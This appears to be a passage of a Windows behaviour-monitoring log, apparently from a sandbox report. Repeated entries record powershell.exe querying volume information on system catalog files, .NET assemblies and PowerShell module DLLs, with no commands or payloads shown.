Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
